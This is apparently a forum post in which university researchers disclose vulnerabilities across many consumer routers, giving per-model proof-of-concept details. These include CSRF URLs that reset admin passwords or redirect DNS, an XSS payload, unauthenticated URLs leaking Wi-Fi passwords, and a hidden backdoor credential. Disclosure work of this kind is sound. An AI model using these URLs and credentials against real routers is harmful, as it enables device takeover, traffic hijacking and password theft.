Search the Community
Showing results for tags 'attacker'.
-
Dear PacketStorm community, we are a group of security researchers doing our IT Security Master's Thesis at Universidad Europea de Madrid. As a part of the dissertation, we have discovered multiple vulnerability issues on the following SOHO routers: 1. Observa Telecom AW4062 2. Comtrend WAP-5813n 3. Comtrend CT-5365 4. D-Link DSL-2750B 5. Belkin F5D7632-4 6. Sagem LiveBox Pro 2 SP 7. Amper Xavi 7968 and 7968+ 8. Sagem Fast 1201 9. Linksys WRT54GL 10. Observa Telecom RTA01N 11. Observa Telecom Home Station BHS-RTA 12. Observa Telecom VH4032N 13. Huawei HG553 14. Huawei HG556a 15. Astoria ARV7510 16. Amper ASL-26555 17. Comtrend AR-5387un 18. Netgear CG3100D 19. Comtrend VG-8050 20. Zyxel P 660HW-B1A 21. Comtrend 536+ 22. D-Link DIR-600 The aforementioned vulnerabilities are: - Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13, #14, #16, #17, #18, #19 and #20. - Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16, #17 and #19. - Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14, #15, #16, #18 and #20. - Denial of Service (DoS) on #1, #5 and #10. - Privilege Escalation on #1. - Information Disclosure on #4 and #11. - Backdoor on #10. - Bypass Authentication using SMB Symlinks on #12. - USB Device Bypass Authentication on #12, #13, #14 and #15. - Bypass Authentication on #13 and #14. - Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6, #7, #10, #11, #12, #13, #14, #16, #21 and #22. CVEs have already been requested to MITRE and other CNAs (since MITRE is taking forever to assign a CVE) and we are waiting for response. OSVDB IDs have been assigned. Vendors and manufacturers have already been reported. All routers have been physically tested. ============================================================================================ Manufacturer: Observa Telecom Model: AW4062 Tested firmwares: 1.3.5.18 and 1.4.2 (latest) Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL customers specially during 2012. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Multiple Cross-site Scriptings (XSS) found into the configuration menu within the router front-web. These XSS give an attacker the opportunity to execute malicious scripts. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121211 (http://osvdb.org/show/osvdb/121211) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e., there’s a vulnerable input field within the subdirectory Domain Blocking. When used legitimately, this input is used to block the traffic between the router and some particular domains. The script will remain stored (persistent XSS) into the field Domain from the Domain Block Table and it will be executed each time the victim access to the Domain Blocking subdirectory. This vulnerability can also be found within the input fields that belong to other subdirectories like Firewall/URL Blocking, Firewall/Port Forwarding, Services/DNS/Dynamic DNS and Advance/SNMP, between others. The most effective attack is found inside the Advance/SNMP subdirectory. By injecting the script into the System Name field, the malicious code will be executed each time someone connects to the router because the script is reflected into the home page. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121210 (http://osvdb.org/show/osvdb/121210), OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and OSVDB-121214 (http://osvdb.org/show/osvdb/121214) * PoC: I.e., if an attacker wants the victim to ping a certain IP address in order to check whether the victim is already logged into the router, he will send this URL to the victim: http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88 It is also possible for an attacker to change the default router password by sending the victim this URL: http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22 The URL above forces the user with index 0 (it is always going to be the user named 1234) to change his default password from 1234 to 12345. The following URL forces the victim to change his DNS servers to those the attacker wants to. http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3= Any action which is available within the website can be attacked through CSRF. This includes opening ports, changing the DHCP and NTP servers, modifying the Wireless Access point, enabling WPS, etc. -------------------------------------------------------------------------------------------- ---------------------------------- Privilege Escalation ---------------------------------- * Description: Any user without administrator rights is able to carry out a privilege escalation by reading the public router configuration file (config.xml). This file stores each of the router configuration parameters, including the credentials from all users in plain text. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and OSVDB-121285 (http://osvdb.org/show/osvdb/121285) * PoC: An user without administrator rights (i.e., user), connects to the router through FTP. This user is able to get both /etc/passwd and config.xml files. The file config.xml stores each of the router configuration parameters in plain text, including the credentials from all users. Doing so, any user is able to gain administrator privileges. This is critical because not too many people know there is another user apart from the administrator one. That means they only change the administrator password, leaving a default user with default credentials (user:user) being able to escalate privileges. -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.1.1/goform/admin/formReboot If a victim opens this URL, router commits all the information and reboots in a process that takes 60 seconds long. There are tons of ways for an attacker to do a Denial of Service attack by exploiting Cross Site Request Forgery vulnerabilities: a) Establish new firewall rules in order to block certain URLs, IPs or MACs. Even setting up a global Deny order is possible and only allowing traffic from/to certain IPs/MAcs. Delete the router configuration that allows itself to connect to the Internet Service Provider. c) Disable the Wireless Interface so no device can be connected through the 802.11 protocol. d) Etc. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: WAP-5813n (tested in Product Numbers 723306-104 and 723306-033) Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one) Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers from 2011 to 2014 -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217) * PoC: Every input field is vulnerable to CSRF. Whenever the administrator user changes his password, he is actually opening the URL: /password.cgi?adminPassword=newpassword. An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890: http://192.168.1.1/password.cgi?adminPassword=1234567890 If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1 -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: CT-5365 Tested firmwares: A111-306TKF-C02_R16 Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers since 2012 -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217) * PoC: Every input field is vulnerable to CSRF. Whenever the administrator user changes his password, he is actually opening the URL: /password.cgi?sysPassword=newpassword. An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890: http://192.168.1.1/password.cgi?sysPassword=1234567890 If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1 -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (Device Info -> DHCP). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: D-Link Model: DSL-2750B Tested firmwares: EU_1.01 Comments: -------------------------------------------------------------------------------------------- ------------------ Information Disclosure (Insecure Object References) ------------------- * Description: An attacker is able to obtain critical information without being logged in. * Report status: Reported to MITRE on 2015-03-25. Waiting for assignation. OSVDB-121219 (http://osvdb.org/show/osvdb/121219) * PoC: By accessing the URL http://192.168.1.1/hidden_info.html, browser shows huge amount of parameters such as SSID, Wi-Fi password, PIN code, etc. without requiring any login process. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122384 (http://osvdb.org/show/osvdb/122384) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Belkin Model: F5D7632-4 Tested firmwares: 6.01.04 Comments: -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out malicious actions. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121220 (http://osvdb.org/show/osvdb/121220) * PoC: Every input field is vulnerable to CSRF. I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so: http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252 &dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89 -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout="" This URL causes the router to reboot, interrupting any active connection and denying the service for about 20 seconds. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122389 (http://osvdb.org/show/osvdb/122389) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Sagem Model: LiveBox 2 Pro Tested firmwares: FAST3yyy_671288 Comments: Common router that ISP Orange used to give away to their ADSL customers. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code, even if the victim is not logged into the router web-config page. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121223 (http://osvdb.org/show/osvdb/121223) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. 1. The SSID field within the “Configuración-> Equipos -> Personalizar” (Configuration->Devices->Personalize) subdirectory allows script code injection. The script execution can be clearly seen within the “Configuración-> Equipos -> Mostrar” (Configuration->Devices->Show) subdirectory. 2. The SSID field within the “Configuración-> LiveBox-> Configuracion Wifi -> SSID-name” (Configuration->LiveBox->Wi-Fi Configuration->SSID-Name) subdirectory allows script code injection. The script execution can be clearly seen within the main log-in webpage, even if the user is not logged in. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122387 (http://osvdb.org/show/osvdb/122387) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Amper Model: Xavi 7968 and Xavi 7968+ Tested firmwares: 3.01APT94 (latest one) Comments: Common router that ISP Telefónica used to give away to their ADSL customers from 2010 to 2013. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121224 (http://osvdb.org/show/osvdb/121224) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (/webconfig/status/dhcp_table.html). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122388 (http://osvdb.org/show/osvdb/122388) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings. ============================================================================================ ============================================================================================ Manufacturer: Sagem Model: Fast 1201 Tested firmwares: 3.01APT94 (latest one) Comments: - -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121222 (http://osvdb.org/show/osvdb/121222) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the DHCP Leases list (dhcpinfo.html). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Linksys Model: WRT54GL Tested firmwares: 4.30.16 build 6 Comments: - -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121221 (http://osvdb.org/show/osvdb/121221) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (DHCPTable.asp). It can be accessed either directly through the URL or through the Status-> Local Network -> DHCP Clients Table subdirectories. Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: RTA01N Tested firmwares: RTK_V2.2.13 Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Multiple Cross-site Scriptings (XSS) found into the configuration menu within the router front-web. These XSS give an attacker the opportunity to execute malicious scripts. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and OSVDB-121788 (http://osvdb.org/show/osvdb/121788) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e., Nombre del host (Hostname) input field within the subdirectory Servicio -> DDNS (Service -> DDNS or /ddns.htm) is vulnerable. There is another vulnerable input field within the Mantenimiento -> Contraseña (Maintenance -> Password or /userconfig.htm) subdirectory. After creating a user whose username contains the malicious script, it is stored into the User Accounts table and executes once the victim accesses this subdirectory. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121786 (http://osvdb.org/show/osvdb/121786) * PoC: I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar cambios" It is also possible for an attacker to change the default router administrator password by sending the victim this URL: http://192.168.1.1/form2userconfig.cgi?username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send" The URL above forces the administrator user (it is always going to be the user named 1234) to change his default password from 1234 to newpass. -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot="Reiniciar"&submit.htm?reboot.htm="Send" If a victim opens this URL, router replies with HTTP 200 OK status code and reboots. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121789 (http://osvdb.org/show/osvdb/121789) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Active Clients table (/dhcptbl.html). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- ----------------------------------------- Backdoor --------------------------------------- * Description: There is a second default administrator user who is hidden to the legitimate router owner. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121785 (http://osvdb.org/show/osvdb/121785) * PoC: In addition to the well-known 1234 administrator user, there is another one named admin, whose password is 7449airocon. This superuser remains hidden (it does only appear into the backup configuration XML file) and is able to modify any configuration settings either through the web interface or through telnet. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules, carry out a persistent denial of service and obtain the WLAN passwords, between other things, by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. It is also possible for an attacker to change the WPS configuration settings, reset the AP to the default ones and obtain critical information, such as WLAN passwords. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: Home Station BHS-RTA Tested firmwares: v1.1.3 Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers -------------------------------------------------------------------------------------------- --------------------------------- Information Disclosure --------------------------------- * Description: Observa Telecom Home Station BHS-RTA web interface allows an external attacker to obtain critical information without login process. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121781 (http://osvdb.org/show/osvdb/121781), OSVDB-121782 (http://osvdb.org/show/osvdb/121782), OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and OSVDB-121784 (http://osvdb.org/show/osvdb/121784) * PoC: Without requiring any login process, an external attacker is able to obtain critical information such as the WLAN password and settings, the Internet configuration, a list of connected clients, etc. By accessing the following URL, browser shows WLAN configuration, including the passwords: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101 By accessing the following URL, browser shows a list of connected clients, including their IP and MAC addresses: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101 By accessing the following URL, browser shows the Internet configuration parameters: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134 By accessing the following URL, browser shows whether the administrator password has been changed or is the default one. http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134 -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: VH4032N Tested firmwares: VH4032N_V0.2.35 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121793 (http://osvdb.org/show/osvdb/121793) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e, the SSID input field is vulnerable if the following code is written in: ‘; </script><script>alert(1)</script><script>// The malicious code will be executed throughout the whole web interface. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and OSVDB-121792 (http://osvdb.org/show/osvdb/121792) * PoC: Although the existence of a token related to session ID, configuration settings can be modified without the need of it. Thus, every input field is vulnerable to CSRF attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass If an attacker wants to change the FTP server configuration settings, such as the password and the allowance of remote FTP WAN connections, he may use the following link: http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2 -------------------------------------------------------------------------------------------- ------------------------ Bypass Authentication using SMB Symlinks ------------------------ * Description: An external attacker, without requiring any login process, is able to download the whole router kernel filesystem, including all the configuration information and the user account information files, by creating symbolic links through the router Samba server. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121790 (http://osvdb.org/show/osvdb/121790) * PoC: An unauthenticated attacker is able to download the whole router filesystem by connecting to the Samba server. There is a shared service (called storage) in which it is possible to create symbolic links to the router filesystem and download the content. I.e., a symlink to / is possible and allows the attacker to freely view and download the entire filesystem. -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121794 (http://osvdb.org/show/osvdb/121794) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings. ============================================================================================ ============================================================================================ Manufacturer: Huawei Model: HG553 Tested firmwares: V100R001C03B043SP01 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121778 (http://osvdb.org/show/osvdb/121778) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- --------------------------------- Bypass Authentication ---------------------------------- * Description: An external attacker, without requiring any login process, is able to reset the router settings to default ones besides bringing a permanent denial of service attack on. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121779 (http://osvdb.org/show/osvdb/121779) * PoC: Without requiring any login process, an attacker is able to bring on a permanent denial of service by constantly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router by using the default credentials. In both attacks, router replies with HTTP 400 status code, but either the reboot or the configuration reset is being correctly executed. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121776 (http://osvdb.org/show/osvdb/121776) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory allows script code injection. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121775 (http://osvdb.org/show/osvdb/121775) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122385 